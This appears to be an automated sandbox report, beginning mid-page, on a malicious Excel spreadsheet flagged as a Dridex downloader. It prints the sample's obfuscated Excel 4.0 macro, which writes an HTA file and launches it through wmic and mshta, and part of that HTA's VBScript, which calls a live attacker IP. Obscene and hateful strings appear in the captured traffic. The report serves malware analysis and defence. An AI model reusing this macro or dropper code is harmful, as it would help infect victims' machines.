                  http://149.129.254.152:8080/6tfcnfucknugget4gpenis3dade5.macroEmshta.exe, 00000006.00000002.688445295.00000000004CE000.00000004.00000020.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://149.129.254.152:8080/6tfcnfucknugget4gpenis3dade5z6cpcd.ms-mmshta.exe, 00000006.00000002.688445295.00000000004CE000.00000004.00000020.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://149.129.254.152:8080/6tfcnfucknugget4gpenis3dade5z6cacromshta.exe, 00000006.00000002.688445295.00000000004CE000.00000004.00000020.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://149.129.254.152:8080/6tfcnfucknugget4gpenis3dade5z6cpcation/mshta.exe, 00000006.00000002.688445295.00000000004CE000.00000004.00000020.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://149.129.254.152:8080/6tfcnfucknugget4gpenis3dade5z6cpcel.temmshta.exe, 00000006.00000002.688445295.00000000004CE000.00000004.00000020.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://investor.msn.com/EXCEL.EXE, 00000000.00000002.690239943.0000000004FB0000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.689081220.0000000003A30000.00000002.00020000.sdmpfalse
                    high
                    http://ns.adoEXCEL.EXE, 00000000.00000002.688581731.0000000000402000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://149.129.254.152:8080/6tfcnfucknugget4gpenis3dade5z6cpcumshta.exe, 00000006.00000002.689908661.0000000004365000.00000004.00000040.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://www.%s.comPAmshta.exe, 00000006.00000002.689533804.0000000003E10000.00000002.00020000.sdmpfalse
                    • URL Reputation: safe
                    low
                    http://ns.adobe.EXCEL.EXE, 00000000.00000002.688581731.0000000000402000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://servername/isapibackend.dllWMIC.exe, 00000003.00000002.559211343.0000000001AB0000.00000002.00020000.sdmpfalse
                    • Avira URL Cloud: safe
                    low
                    http://149.129.254.152:8Vmshta.exe, 00000006.00000002.688964982.00000000035E0000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    low

                    Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public

                    IPDomainCountryFlagASNASN NameMalicious
                    149.129.254.152
                    unknownSingapore
                    45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCfalse

                    General Information

                    Joe Sandbox Version:34.0.0 Boulder Opal
                    Analysis ID:532575
                    Start date:02.12.2021
                    Start time:14:03:21
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 6m 5s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Sample file name:order 4544471372.xls
                    Cookbook file name:defaultwindowsofficecookbook.jbs
                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                    Number of analysed new started processes analysed:8
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal96.troj.expl.evad.winXLS@4/6@0/1
                    EGA Information:Failed
                    HDC Information:Failed
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 0
                    • Number of non-executed functions: 2
                    Cookbook Comments:
                    • Adjust boot time
                    • Enable AMSI
                    • Found application associated with file extension: .xls
                    • Found Word or Excel or PowerPoint or XPS Viewer
                    • Attach to Office via COM
                    • Scroll down
                    • Close Viewer
                    Warnings:
                    Show All
                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtSetInformationFile calls found.

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    14:05:29API Interceptor12x Sleep call for process: WMIC.exe modified
                    14:05:30API Interceptor6x Sleep call for process: mshta.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    149.129.254.152SecuriteInfo.com.Heur.31616.xlsGet hashmaliciousBrowse
                    • 149.129.254.152:8080/6tfcnfucknugget4gpenis3dade5z6cpc
                    SecuriteInfo.com.Heur.26641.xlsGet hashmaliciousBrowse
                    • 149.129.254.152:8080/6tfcnfucknugget4gpenis3dade5z6cpc
                    plans_48055147646.xlsGet hashmaliciousBrowse
                    • 149.129.254.152:8080/6tfcnfucknugget4gpenis3dade5z6cpc
                    plans_48055147646.xlsGet hashmaliciousBrowse
                    • 149.129.254.152:8080/6tfcnfucknugget4gpenis3dade5z6cpc
                    invoice template929473689.xlsGet hashmaliciousBrowse
                    • 149.129.254.152:8080/6tfcnfucknugget4gpenis3dade5z6cpc
                    invoice template929473689.xlsGet hashmaliciousBrowse
                    • 149.129.254.152:8080/6tfcnfucknugget4gpenis3dade5z6cpc
                    variants_589243533.xlsGet hashmaliciousBrowse
                    • 149.129.254.152:8080/6tfcnfucknugget4gpenis3dade5z6cpc
                    highlights-40677152292.xlsGet hashmaliciousBrowse
                    • 149.129.254.152:8080/6tfcnfucknugget4gpenis3dade5z6cpc
                    variants_589243533.xlsGet hashmaliciousBrowse
                    • 149.129.254.152:8080/6tfcnfucknugget4gpenis3dade5z6cpc
                    highlights-40677152292.xlsGet hashmaliciousBrowse
                    • 149.129.254.152:8080/6tfcnfucknugget4gpenis3dade5z6cpc
                    variants_8857120413.xlsGet hashmaliciousBrowse
                    • 149.129.254.152:8080/6tfcnfucknugget4gpenis3dade5z6cpc
                    variants_8857120413.xlsGet hashmaliciousBrowse
                    • 149.129.254.152:8080/6tfcnfucknugget4gpenis3dade5z6cpc
                    payment_4151226701.xlsGet hashmaliciousBrowse
                    • 149.129.254.152:8080/6tfcnfucknugget4gpenis3dade5z6cpc
                    alternatives-990191355.xlsGet hashmaliciousBrowse
                    • 149.129.254.152:8080/6tfcnfucknugget4gpenis3dade5z6cpc
                    highlights86151613925.xlsGet hashmaliciousBrowse
                    • 149.129.254.152:8080/6tfcnfucknugget4gpenis3dade5z6cpc

                    Domains

                    No context

                    ASN

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCSecuriteInfo.com.Heur.31616.xlsGet hashmaliciousBrowse
                    • 149.129.254.152
                    SecuriteInfo.com.Heur.26641.xlsGet hashmaliciousBrowse
                    • 149.129.254.152
                    SecuriteInfo.com.Heur.5035.docGet hashmaliciousBrowse
                    • 8.209.79.68
                    SecuriteInfo.com.Heur.6074.docGet hashmaliciousBrowse
                    • 8.209.79.68
                    plans_48055147646.xlsGet hashmaliciousBrowse
                    • 149.129.254.152
                    plans_48055147646.xlsGet hashmaliciousBrowse
                    • 149.129.254.152
                    SecuriteInfo.com.Heur.31820.docGet hashmaliciousBrowse
                    • 8.209.79.68
                    SecuriteInfo.com.Heur.17389.docGet hashmaliciousBrowse
                    • 8.209.79.68
                    SecuriteInfo.com.Heur.28256.docGet hashmaliciousBrowse
                    • 8.209.79.68
                    invoice template929473689.xlsGet hashmaliciousBrowse
                    • 149.129.254.152
                    invoice template929473689.xlsGet hashmaliciousBrowse
                    • 149.129.254.152
                    variants_589243533.xlsGet hashmaliciousBrowse
                    • 149.129.254.152
                    highlights-40677152292.xlsGet hashmaliciousBrowse
                    • 149.129.254.152
                    variants_589243533.xlsGet hashmaliciousBrowse
                    • 149.129.254.152
                    highlights-40677152292.xlsGet hashmaliciousBrowse
                    • 149.129.254.152
                    variants_8857120413.xlsGet hashmaliciousBrowse
                    • 149.129.254.152
                    variants_8857120413.xlsGet hashmaliciousBrowse
                    • 149.129.254.152
                    payment_4151226701.xlsGet hashmaliciousBrowse
                    • 149.129.254.152
                    alternatives-990191355.xlsGet hashmaliciousBrowse
                    • 149.129.254.152
                    highlights86151613925.xlsGet hashmaliciousBrowse
                    • 149.129.254.152

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    No context

                    Created / dropped Files

                    C:\ProgramData\tCeltZ.rtf
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                    Category:modified
                    Size (bytes):5004
                    Entropy (8bit):5.102988854105844
                    Encrypted:false
                    SSDEEP:96:NZVagS812z4VR9r+ZYjrPd06dtalqZPV1sCxKfvM6YGYGJAHHJKZz2mJuR/x3VGK:NZQ012z4/1+ZYjbyKmqZ1xAnYPGMcym6
                    MD5:A98108794EDA278A4E8626B56FE4B231
                    SHA1:C0AB9E72B0E85C5BFB6B89F1428B5240EC6AEA60
                    SHA-256:DE3A47367EF37CD391133E378F03FE317D98A7916E4E192E5513EC19159A10D9
                    SHA-512:33C3233FABFB9BA0A79E1AAF7CD2F8861C81971454362315CFF8366D8647E91CFEBF49BA82E26FA7D090D92E203723D1C61F74BEDD0A280145C000470BFDBA9F
                    Malicious:true
                    Yara Hits:
                    • Rule: JoeSecurity_DridexDownloader, Description: Yara detected Dridex Downloader, Source: C:\ProgramData\tCeltZ.rtf, Author: Joe Security
                    Reputation:low
                    Preview: <!DOCTYPE html>..<html>..<head>..<HTA:APPLICATION ID="CS"..APPLICATIONNAME="ttrgnkrtegjtjgjerg"..WINDOWSTATE="minimize"..MAXIMIZEBUTTON="no"..MINIMIZEBUTTON="no"..CAPTION="no"..SHOWINTASKBAR="no">..<script type="text/vbscript" LANGUAGE="VBScript" >....Function PRGgdsXbPi()..Set uPWUurSwKjJEMwcj = CreateObject(Chr(77) & "SX" & Chr(77) & "" & "" & Chr(76) & Chr(50) & ".Se" & "rv" & "erX" & "MLH" & Chr(84) & "" & Chr(84) & "P." & "6.0" & "")..uPWUurSwKjJEMwcj.Open "" & "" & "" & "" & "GE" & Chr(84) & "", "ht" & Chr(116) & "p:/" & Chr(47) & "14" & "9." & "12" & "9.2" & "54." & "" & "152" & ":8" & "080" & "" & "/6" & "" & "tfc" & "nfu" & Chr(99) & Chr(107) & "nu" & "gg" & "et" & "4g" & Chr(112) & "en" & "is" & "3da" & Chr(100) & "" & "" & "e5" & "z6c" & "pc", False ..uPWUurSwKjJEMwcj.SetRequestHeader "User-Agent","rape"..uPWUurSwKjJEMwcj.Send..End Function....Function VKcVtLgGiyUyBtF()..NiJZKsgWiRQhouXQ = "wmi" & "c " & Chr(112) & Chr(114) & "oc" & "ess" & Chr(32) & "cal" & "l " & Chr(99) &
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\83027875.png
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:PNG image data, 1170 x 183, 8-bit/color RGBA, non-interlaced
                    Category:dropped
                    Size (bytes):101504
                    Entropy (8bit):7.9825226677650285
                    Encrypted:false
                    SSDEEP:3072:LxMlT0h4377gYllmQskO2UMXGVi2e/JjNxSan6NljwSWEx02l9dIND145:GahmlYOOeRnwNKIde145
                    MD5:AA4CE969F3A7539F94F12DBA43D9D36F
                    SHA1:67FBAFD61ABB04C68A2C4E074959C49AF1CF6DBB
                    SHA-256:BC3719669DEBD201C5FE2E16EB38605287FDD5DAB45445264388A58282F28999
                    SHA-512:78E78115A9929B04E5C4D26A735E9CC76831525A51C7CD97FDA849BD9377C3FEE503E770C7CF9B5FF1E0F13F0A4A38F21A8E164C1CA8C038F110D877EC7175CE
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    Preview: .PNG........IHDR.............I.t....JiCCPICC Profile..x..W.TS...[RIh..H...R.K..E..*..I ...D....]D@].U.E...ZQ...]......l..I.]=...s........{g...I.....y.|Y|D.kBj.......Z...x|...........7..../.(......'.... q.g...<......|..>Po=#_.. 6...!.*q...(q..W.l..9....L..dY.h7C=....y.o@.*..%..!..x..#!...7M...p...'....C.<^..V..r.X.....?..%/W1...6.H.......F.(%.A.#...X..wb...b.*RD&..QS...k.....x.Q..B......32..\...A....D..EByX...F6->v.g.8l....L.Wi.R.............D.).1j.89.bm...(..fS$.........m ..J"B...LYx..^.'...[$.sc4.*_........7..Y(a'.......s..C..c...$M.X.4?$^3..47Nc.S...J......\<0..H5?.#.KT.gd......A4..P....2.4....=M=.z$....d.!p.h.g..F$...._...|h^.jT.....V.t..........<..r.o.j.d.[2x.5...a...)...&Z.Q..t.-.a.Pb$1.....?.......>..`._..........N...b.7...8..=.kr..:g...z.!x...8.7...h..A.P..D...[....U.5v.W.J.F..8|;S.I.s.EY.+..5c.....o.s.....Q.Zb..}X.v.;.....;.5c..J<....V..xU<9.G..?....r.z.n..|a....8.3e.,Q>....B.W..9........;.~M.b.......]q............8........Z..
                    C:\Users\user\Desktop\7E530000
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:Microsoft Excel 2007+
                    Category:dropped
                    Size (bytes):155722
                    Entropy (8bit):7.959548831007507
                    Encrypted:false
                    SSDEEP:3072:TmULnF3WQyZsPid87QIawYXWwxMlT0h4377gYllmQskO2UMXGVi2e/JjNxSan6Nu:TmULkQ6sPu88JwTahmlYOOeRnwNKIdeP
                    MD5:8AC1324488C58D023D2EB0B3373F820D
                    SHA1:1CF1036172B47D06220C64EE3FA4AF140E4A7B34
                    SHA-256:5624CB55533E5BA17FB289446E25C36BD6FD1CB9201CE1171B9ECD32D6C4128A
                    SHA-512:58AD41812F9935AF616A9B34DCE52C10EE5220A34315412CD76F7AA2BAEA152A9BA33C4EEB8F071A32FEB2D731DAEC868C43FC660C3B83EFCA0EF324803065AE
                    Malicious:false
                    Reputation:low
                    Preview: PK..........!.z..d....w.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J.@.5e.e....p.ik./y...3NK.U.P....gf....b...w5.W=V..^i7....Ky..L.)a...m.....j.......l.Rx........p.3..D.q...1.~...q.]...=.p..S.4..mhy..D;V<......."Q.|.........\Z..0D.....*DM...)Qb..Ifp.#..9.~Z.....#.}.*R6..\...b.!..u.....F.....^..j..k.....U.I....6.L.T..BF?rbb...v...!5.7R.....G...]J.}.....#.D..xs.K..!46.@L[......~7.....X......7j.R....H."..Y..XV... &...;u..Dj..G....S.N.y36._.......PK..........!..
                    C:\Users\user\Desktop\7E530000:Zone.Identifier
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):26
                    Entropy (8bit):3.95006375643621
                    Encrypted:false
                    SSDEEP:3:ggPYV:rPYV
                    MD5:187F488E27DB4AF347237FE461A079AD
                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                    Malicious:false
                    Reputation:high, very likely benign file
                    Preview: [ZoneTransfer]....ZoneId=0
                    C:\Users\user\Desktop\order 4544471372.xls (copy)
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:Microsoft Excel 2007+
                    Category:dropped
                    Size (bytes):155722
                    Entropy (8bit):7.959548831007507
                    Encrypted:false
                    SSDEEP:3072:TmULnF3WQyZsPid87QIawYXWwxMlT0h4377gYllmQskO2UMXGVi2e/JjNxSan6Nu:TmULkQ6sPu88JwTahmlYOOeRnwNKIdeP
                    MD5:8AC1324488C58D023D2EB0B3373F820D
                    SHA1:1CF1036172B47D06220C64EE3FA4AF140E4A7B34
                    SHA-256:5624CB55533E5BA17FB289446E25C36BD6FD1CB9201CE1171B9ECD32D6C4128A
                    SHA-512:58AD41812F9935AF616A9B34DCE52C10EE5220A34315412CD76F7AA2BAEA152A9BA33C4EEB8F071A32FEB2D731DAEC868C43FC660C3B83EFCA0EF324803065AE
                    Malicious:true
                    Reputation:low
                    Preview: PK..........!.z..d....w.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J.@.5e.e....p.ik./y...3NK.U.P....gf....b...w5.W=V..^i7....Ky..L.)a...m.....j.......l.Rx........p.3..D.q...1.~...q.]...=.p..S.4..mhy..D;V<......."Q.|.........\Z..0D.....*DM...)Qb..Ifp.#..9.~Z.....#.}.*R6..\...b.!..u.....F.....^..j..k.....U.I....6.L.T..BF?rbb...v...!5.7R.....G...]J.}.....#.D..xs.K..!46.@L[......~7.....X......7j.R....H."..Y..XV... &...;u..Dj..G....S.N.y36._.......PK..........!..
                    C:\Users\user\Desktop\~$order 4544471372.xls
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):165
                    Entropy (8bit):1.4377382811115937
                    Encrypted:false
                    SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                    MD5:797869BB881CFBCDAC2064F92B26E46F
                    SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                    SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                    SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                    Malicious:true
                    Reputation:high, very likely benign file
                    Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                    Static File Info

                    General

                    File type:Microsoft Excel 2007+
                    Entropy (8bit):7.950279542064319
                    TrID:
                    • Excel Microsoft Office Open XML Format document with Macro (51004/1) 51.52%
                    • Excel Microsoft Office Open XML Format document (40004/1) 40.40%
                    • ZIP compressed archive (8000/1) 8.08%
                    File name:order 4544471372.xls
                    File size:153116
                    MD5:531039a455e1f0598cd201b785a1152a
                    SHA1:4880df9e94090243029e54a34e941c70298401c7
                    SHA256:cf0d6ea61f8e56f80f24792e356adeab2f92b6db2f980a9e5932415484f5b732
                    SHA512:5a74dd1f8391f9991e43b11ee8af2ca4ddc0b7045116451293f7fa2a5e0d90d9fac66f1eb8d766d03779d5adbeb0e2845709a2cce4663d70af875512e98b29f3
                    SSDEEP:3072:9l0wcwAKQXICZPdxMlT0h4377gYllmQskO2UMXGVi2e/JjNxSan6NljwSWEx02lE:v0qAKeCahmlYOOeRnwNKIde14jd2
                    File Content Preview:PK..........!.8v..............[Content_Types].xml ...(.........................................................................................................................................................................................................

                    File Icon

                    Icon Hash:e4eea286a4b4bcb4

                    Static OLE Info

                    General

                    Document Type:OpenXML
                    Number of OLE Files:1

                    OLE File "order 4544471372.xls"

                    Indicators

                    Has Summary Info:
                    Application Name:
                    Encrypted Document:
                    Contains Word Document Stream:
                    Contains Workbook/Book Stream:
                    Contains PowerPoint Document Stream:
                    Contains Visio Document Stream:
                    Contains ObjectPool Stream:
                    Flash Objects Count:
                    Contains VBA Macros:

                    Macro 4.0 Code

                    1,18,=B46-B52
                    3,18,=U6*I71
                    4,18,=B83*G21
                    7,18,=B77*R92
                    8,18,=W36-M75
                    9,18,=B46-O46
                    11,18,=U77-C57
                    12,18,=E12-P4
                    14,18,=ALERT("" & CHAR(69) & CHAR(114) & "ro" & CHAR(114) & "! S" & CHAR(101) & CHAR(110) & "ding " & CHAR(114) & "eport" & CHAR(32) & CHAR(116) & "o Mi" & CHAR(99) & "ros" & CHAR(111) & CHAR(102) & "t." & CHAR(46) & CHAR(46))
                    15,18,=M14-U64
                    17,18,=E84+W18
                    18,18,=A24-C32
                    20,18,=D23-B20
                    21,18,=H56-A9
                    22,18,=I25+E46
                    23,18,=B36*X99
                    25,18,=E47*D60
                    29,18,=FOPEN("" & CHAR(67) & ":\ProgramData\tCeltZ." & CHAR(114) & "tf", 3)
                    32,18,=H49+Y83
                    38,18,=I28*Z36
                    39,18,=FOR.CELL("nNwXHnQeUQ",Sheet1!BC161:BC5164, TRUE)
                    42,18,=H4+Q85
                    43,18,=T83*Y92
                    45,18,=P53-Z33
                    49,18,=Z74-U45
                    51,18,=J16*G4
                    52,18,=FWRITE(0,CHAR(nNwXHnQeUQ))
                    54,18,=B78+K46
                    57,18,=K76*U21
                    58,18,=E59+I66
                    59,18,=B76*H43
                    61,18,=L9+M51
                    62,18,=NEXT()
                    63,18,=J93-Y76
                    65,18,=O26+Z33
                    67,18,=R40+R44
                    70,18,=P71-K20
                    72,18,=H56*M6
                    73,18,=K100*A21
                    74,18,=U56-N36
                    76,18,=EXEC("wmic proces" & CHAR(115) & " call create " & CHAR(34) & "msh" & CHAR(116) & "a C:\Pro" & CHAR(103) & "ram" & CHAR(68) & "ata" & CHAR(92) & "tC" & CHAR(101) & "" & CHAR(108) & CHAR(116) & "Z.rtf" & CHAR(34))
                    77,18,=I96-M97
                    81,18,=B62+L66
                    83,18,=Y51+X5
                    89,18,=RETURN()
                    

                    Network Behavior

                    Network Port Distribution

                    TCP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Dec 2, 2021 14:05:29.989028931 CET491658080192.168.2.22149.129.254.152
                    Dec 2, 2021 14:05:30.276551962 CET808049165149.129.254.152192.168.2.22
                    Dec 2, 2021 14:05:30.277992964 CET491658080192.168.2.22149.129.254.152
                    Dec 2, 2021 14:05:30.279845953 CET491658080192.168.2.22149.129.254.152
                    Dec 2, 2021 14:05:30.567136049 CET808049165149.129.254.152192.168.2.22
                    Dec 2, 2021 14:05:30.945271969 CET808049165149.129.254.152192.168.2.22
                    Dec 2, 2021 14:05:31.163992882 CET491658080192.168.2.22149.129.254.152

                    HTTP Request Dependency Graph

                    • 149.129.254.152:8080

                    HTTP Packets

                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    0192.168.2.2249165149.129.254.1528080C:\Windows\System32\mshta.exe
                    TimestampkBytes transferredDirectionData
                    Dec 2, 2021 14:05:30.279845953 CET0OUTGET /6tfcnfucknugget4gpenis3dade5z6cpc HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    Accept-Language: en-us
                    User-Agent: rape
                    Host: 149.129.254.152:8080
                    Dec 2, 2021 14:05:30.945271969 CET0INHTTP/1.1 200 OK
                    Server: nginx/1.15.12
                    Date: Thu, 02 Dec 2021 13:05:30 GMT
                    Content-Type: text/plain; charset=utf-8
                    Content-Length: 8
                    Connection: keep-alive
                    Data Raw: 68 69 20 6e 61 7a 69 73
                    Data Ascii: hi nazis


                    Code Manipulations

                    Statistics

                    CPU Usage

                    Click to jump to process

                    Memory Usage

                    Click to jump to process

                    High Level Behavior Distribution

                    Click to dive into process behavior distribution

                    Behavior

                    Click to jump to process

                    System Behavior

                    General

                    Start time:14:04:25
                    Start date:02/12/2021
                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    Wow64 process (32bit):false
                    Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                    Imagebase:0x13f300000
                    File size:28253536 bytes
                    MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    General

                    Start time:14:05:28
                    Start date:02/12/2021
                    Path:C:\Windows\System32\wbem\WMIC.exe
                    Wow64 process (32bit):false
                    Commandline:wmic process call create "mshta C:\ProgramData\tCeltZ.rtf"
                    Imagebase:0xff760000
                    File size:566272 bytes
                    MD5 hash:FD902835DEAEF4091799287736F3A028
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    General

                    Start time:14:05:29
                    Start date:02/12/2021
                    Path:C:\Windows\System32\mshta.exe
                    Wow64 process (32bit):false
                    Commandline:mshta C:\ProgramData\tCeltZ.rtf
                    Imagebase:0x13fdc0000
                    File size:13824 bytes
                    MD5 hash:95828D670CFD3B16EE188168E083C3C5
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    Disassembly

                    Code Analysis

                    Reset < >

                      Executed Functions

                      Non-executed Functions

                      Strings
                      • D\{00020833-0000-0000-C000-000000000046}, xrefs: 024E7B10
                      Memory Dump Source
                      • Source File: 00000000.00000002.689008475.00000000024E0000.00000004.00000001.sdmp, Offset: 024E0000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID: D\{00020833-0000-0000-C000-000000000046}
                      • API String ID: 0-3726640209
                      • Opcode ID: ad5c412d497ac64bc3ce25bab9acb661bc969ba7dda1de3d8cc2cacaa3049cfa
                      • Instruction ID: 222af9520ba267cc77455e892784d80e98daa578c3a9c4542368d49d8c66c29f
                      • Opcode Fuzzy Hash: ad5c412d497ac64bc3ce25bab9acb661bc969ba7dda1de3d8cc2cacaa3049cfa
                      • Instruction Fuzzy Hash: 0FC1426284E3D20FD30B8B749DB66A1BFB19E1351871E45DBC1C2CF4A3E209596AC763
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.688417660.000000000010C000.00000004.00000020.sdmp, Offset: 0010C000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: dbb629b6a0041cc8266023e2e4af4fe42480ea5ab46c60c8582c3a64c6e105af
                      • Instruction ID: 9edc4d5924d586c6d6da6db119463052f46168e9336fad2b34e34011587504eb
                      • Opcode Fuzzy Hash: dbb629b6a0041cc8266023e2e4af4fe42480ea5ab46c60c8582c3a64c6e105af
                      • Instruction Fuzzy Hash: EB42CFA244E3C15FD3038B7498BA6917FB0AE23224B1E85DBC0D1CF5E3E259595AD722
                      Uniqueness

                      Uniqueness Score: -1.00%